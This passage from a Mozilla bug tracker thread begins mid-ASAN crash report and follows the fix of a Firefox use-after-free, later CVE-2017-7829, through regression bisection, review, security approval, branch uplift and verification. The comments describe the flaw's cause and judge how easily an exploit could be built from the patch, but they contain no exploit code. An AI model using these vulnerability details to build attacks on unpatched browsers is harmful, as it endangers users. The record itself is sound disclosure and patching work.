  Left alloca redzone:     ca
  Right alloca redzone:    cb
==10774==ABORTING
Reporter

Comment 1

2 years ago
Posted file ASAN output
David: This doesn't look Stylo-related. Any idea who should own this?
Group: core-security → layout-core-security
Flags: needinfo?(dbaron)
Is this reported against a build with bug 1406750 fixed or not?

In general, the date-based buildid is not nearly as useful as the actual changeset id from about:buildconfig in answering questions like that...
Assuming this is reported against rev aa958b29c149, that is with bug 1406750 fixed...
INFO: Last good revision: c7db33cbe5ded3c342ef672c5da366b2e1ff1b0f
INFO: First bad revision: ece6798a15ba1a94c497166142dc84e74a157471
INFO: Pushlog:
https://hg.mozilla.org/integration/autoland/pushloghtml?fromchange=c7db33cbe5ded3c342ef672c5da366b2e1ff1b0f&tochange=ece6798a15ba1a94c497166142dc84e74a157471

Confirmed that Beta and ESR52 also crash.
Has Regression Range: --- → yes
Nils, can you confirm the changeset you used for this build? (and note Boris's comment that that would be more useful than the date in the future).
Flags: needinfo?(nils)
Keywords: regression
Assignee: nobody → emilio
Building now... I bet the up-front flush is killing mPresShell... The "cool" part is that I suspect this bug was already there before the patch (just more tricky, since it required getComputedStyle to be called inside a ::first-line or something like that, I believe).
(In reply to Emilio Cobos Álvarez [:emilio] from comment #7)
> Building now... I bet the up-front flush is killing mPresShell... The "cool"
> part is that I suspect this bug was already there before the patch (just
> more tricky, since it required getComputedStyle to be called inside a
> ::first-line or something like that, I believe).

Yeah, indeed, the shell is dead... Writing a patch now.
Just for reference. The flush in UpdateCurrentStyleSources is presShellForContent of course.
(I should've probably thought of this while writing bug 1406750 btw... :/)
Posted patch Patch.Splinter Review
Only fetch mPresShell after flushing the relevant content pres shell.
Attachment #8923022 - Flags: review?(bzbarsky)
Comment on attachment 8923022 [details] [diff] [review]
Patch.

r=me
Attachment #8923022 - Flags: review?(bzbarsky) → review+
Comment on attachment 8923022 [details] [diff] [review]
Patch.

[Security approval request comment]
How easily could an exploit be constructed based on the patch?

Not much, someone needs to figure out how to kill the PresShell from the other flush, which is non-trivial.

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?
Kinda, it's not obvious that mPresShell is a weak pointer, but it's not hard to figure out either.

Which older supported branches are affected by this flaw?
All

If not all supported branches, which bug introduced the flaw?
The bug was pre-existing before bug 1371259 (a test-case was just harder to construct), but bug 1371259 makes that flush unconditional thus making this test-case crash.

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?
They would be roughly the same, it's moving the block introduced in bug 1371259 a few lines after it.

How likely is this patch to cause regressions; how much testing does it need?
I don't think much. This should finally fix this "flush of one presShell kills mPresShell" since we flush before getting the raw pointer.
Attachment #8923022 - Flags: sec-approval?
Release management, I'd like to give sec-approval for this on trunk and then take this on Beta and ESR52. It is a small patch and fixes a real issue here. I need your approval at this stage to do it though.

I'm fixing the "56 unaffected" flag as, given the answers to the questions and the ESR52 affected setting, that seems to be marked in error.
Flags: needinfo?(rkothari)
Flags: needinfo?(lhenry)
Seems reasonable, and this can make it into the beta 13 build on Monday if we land it by Monday morning
Flags: needinfo?(lhenry)
Comment on attachment 8923022 [details] [diff] [review]
Patch.

sec-approval+ for trunk.
Please nominate patches for ESR52 and Beta.
Flags: needinfo?(emilio)
Attachment #8923022 - Flags: sec-approval? → sec-approval+
https://hg.mozilla.org/integration/mozilla-inbound/rev/044406030675adf7dfdb0317fca3852fa1ea3ff7

Please request Beta & ESR52 approval on this ASAP.
Flags: needinfo?(rkothari)
Flags: needinfo?(nils)
Comment on attachment 8923022 [details] [diff] [review]
Patch.

Approval Request Comment
[Feature/Bug causing the regression]: bug 1371259 (but same gotchas as explained in comment 13 apply)
[User impact if declined]: security vulnerability.
[Is this code covered by automated tests?]: not landed yet.
[Has the fix been verified in Nightly?]: no
[Needs manual test from QE? If yes, steps to reproduce]: no 
[List of other uplifts needed for the feature/fix]: none
[Is the change risky?]: not very risky, see comment 13 for a more detailed analysis.
[Why is the change risky/not risky?]: Patch is minimal, only moves a flush before we actually get a raw pointer to something that may get killed because of that flush.
[String changes made/needed]: none
Flags: needinfo?(emilio)
Attachment #8923022 - Flags: approval-mozilla-esr52?
Attachment #8923022 - Flags: approval-mozilla-beta?
Comment on attachment 8923022 [details] [diff] [review]
Patch.

Sec-high, Beta57+, ESR52+
Attachment #8923022 - Flags: approval-mozilla-esr52?
Attachment #8923022 - Flags: approval-mozilla-esr52+
Attachment #8923022 - Flags: approval-mozilla-beta?
Attachment #8923022 - Flags: approval-mozilla-beta+
https://hg.mozilla.org/mozilla-central/rev/044406030675
Status: NEW → RESOLVED
Last Resolved: 2 years ago
Resolution: --- → FIXED
Target Milestone: --- → mozilla58
Whiteboard: [adv-main57+][adv-esr52.5+]
Group: layout-core-security → core-security-release
Alias: CVE-2017-7829
Comment hidden (obsolete)
Correction:

Confirmed issue on Fx57.0b3.
Verified fixed on Fx57.0b14 and Fx52.5.0esr.
Alias: CVE-2017-7829
I have managed to reproduce the issue mentioned in comment 0 using Firefox 58.0a1 (BuildId:20171026092151).

This issue is no longer reproducible using Firefox 59.0a1 (BuildID:20171214095211), 58.0b11 (BuildId:20171212143601), 57.0.2 (BuildId:20171207111528) and 52.5.3 esr (BuildId:20171213195455) ASAN builds using Ubuntu 16.04 64bit.
Flags: sec-bounty?
Flags: sec-bounty? → sec-bounty+
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.